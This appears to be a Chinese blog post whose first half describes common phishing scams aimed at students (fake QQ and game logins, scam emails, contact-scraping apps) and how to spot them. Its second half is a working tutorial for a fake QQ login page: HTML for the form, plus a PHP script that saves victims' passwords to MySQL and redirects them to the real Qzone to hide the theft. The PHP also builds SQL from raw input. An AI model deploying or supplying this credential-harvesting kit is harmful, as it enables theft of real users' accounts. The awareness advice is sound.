一、钓鱼网站
最气人但是最真实的一种方式,分为以下几种:
1、伪装为游戏官网进行诈骗
eg:DNF,LOL官网等
点击链接后弹出登录框,此时输入账号密码,当点击登录按钮,此时才会正式跳转官网,神不知鬼不觉拿走你的账号密码。(此技术最后会讲到)然后你辛辛苦苦打的账号被封掉,气不气。
PS:一般这种网站,超链接标签看不到详细的url,并且网页图片模糊,ps技术不过关等明显特征。
2、邮件形式
eg:体温检测邮件、姓名学号电话住址核对邮件、教导处分数邮件、邀请你看照片邮件等等层出不穷。
此种邮件真心是有点坑啊,你说是点还是不点,不点可能会被老班单独照顾,点了可能会被盗号,唉,咋整
PS:盗号网站的特征如下
1、QQ登录页面,除了QQ账号、密码,以及登录3个控件有效外,其它地方,如忘记密码,注册等都是无效的,你可以对比下真实的QQ登录页面。
2、QQ登录页面,一般没有关闭按钮,而且页面做工粗糙,或者直接是一张截图。
3、用户第一次输入账号密码,往往会提示错误,再任一输一次,就会进入正归的网页。(当然这种人可能已经被盗号了,例如我)
4、当然也可能是第一次输入后,显示登陆成功,但是不做任何跳转,此时,赶紧改密码,别问为啥,你在问为啥的时候,人家已经盗你号了,和他争分夺秒,看谁改密码快。
5、最有效的识别,往往最简单,其实腾讯登录产品都有快捷登录的。
咳咳: 不过,我们还是可以搞点恶作剧的,在他那QQ登录页面任意输入账号密码。哈哈,你懂的,让盗客们忙去吧!
3、网络邀请函形式
PS:碰见这种,最简单有效的方式,和发起人核对一下便知真假。
二、“app”爬取信息
好友会给你发二维码让你下载app(app大多为直播app,实为脚本),然后给你一个邀请码,让你填进去,等你一切完成之后,之后你的电话本以及备忘录,以及一切文本形式文件会被全部爬取,之后盗客会用其进行诈骗,爬取的信息用来降低被诈骗者的防备。
PS:一般这种,尽量首先电话过去进行确认,同时,如果防备较为薄弱,已经下载好该“app”,那么就可以看到,下载好后只有一个按钮“ 完成 ”,正规app下载好后有两个按钮“打开”“完成”
三、伪装为当红最热的类似拼多多领红包的链接
类似这种,点击后会进行登陆验证,点击后盗取账号密码,一般这种遇见后,与本人进行确定。
四、PS学姐
这是一个梗,遇见这种人直接不理,否则第二天,你会发现,哦的天,我怎么加了这么多群,租房子、同城洗脚、非诚勿扰、ps、竟然还有妇女群,我的天。遇见这种人直接屏蔽。
上述即为我和朋友的踩坑记录,下面讲讲钓鱼网站的构建以及原理
环境搭建:
phpstudy:
Navicat Premium或者phpadmin
Sublime
1、开启phpstudy,开启mysql&apache
PS:
Apache是web服务器端软件,充当代理服务器与网站进行通信;
MySQL是当下流行的一款关系数据库管理系统,我们用它来创建数据库。
2.创建接收用户的数据库
打开Navicat Premium,点击链接,选择链接MySQL,输入链接名和密码
创建链接之后就可以开始建立数据库了
创建表并且添加好格完成后点击运行按钮,然后右键点击链接库选择断开链接,之后再重新点击链接数据库,这样我们就建立了一个用来存放信息的表
3、创建钓鱼网页
打开sublime,将PHPstudy安装目录下的WWW目录拖拽到sublime中,WWW目录下新建diaoyu.html文件,接下来就可以来编写我们的网页了
<!DOCTYPE html>
<html lang="en"> <!--声明当前页面语言类型为English-->
<head>
<meta charset="UTF-8">
<title>登录页面</title> <!--定义页面标题-->
<style type="text/css">
div{
width:100px;
height:100px;
margin:100px auto;
}
p{margin: 30px auto}
</style>
</head>
<body>
<div>
<image src="images/***.jpg" width="100" height="100">
</div>
<form action="./diaoyu.php" method="post">
<center>
<p>账号:<input type="text" name="username" id=""></br></p>
<p>密码:<input type="password" name="password" id=""></br></p>
<input type="submit" value="登录"
style="width: 250px;height: 40px;background-color: blue; font-size:18px;color:white;">
</center>
</form>
</body>
</html>
保存代码后,在浏览器中输入localhost/diaoyu.html,此时浏览器以http协议运行网页,页面显示的是一个简单的QQ登录页面
4、通过diaoyu.php将用户数据导入到php数据库中
上面代码仅仅实现了向服务器提交表单的功能,而我们最终的目的是将表单上的数据存储到我们的数据库中,因此我们还需要写一个服务器端脚本,命名为diaoyu.php
<?php
$username = $_POST['username'];
$password = $_POST['password'];
$time = time();
$pdo = new PDO('mysql:dbname=php','root','root');//执行sql语句(将输入的账号密码保存到MySQL仓库中)
$rs = $pdo->exec("insert into users values(null,'$username','$password',$time,$time)");
$realUrl='https://qzone.qq.com/';//判断跳转
if($rs){
echo "<script>alert('success');location.href='$realUrl'</script>";
}else{
echo "<script>alert('failure');location.href='$realUrl'</script>";
}?>//提交信息后输出警告框提示信息,并跳转到到真实的腾讯qq网址
5、中查看用户输入的信息(Navicat Premium或者phpadmin)
做完以上的步骤,用户提交的账号密码就已经在我们的数据库里啦。
第二周 2020/7/29
扫一扫
142
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
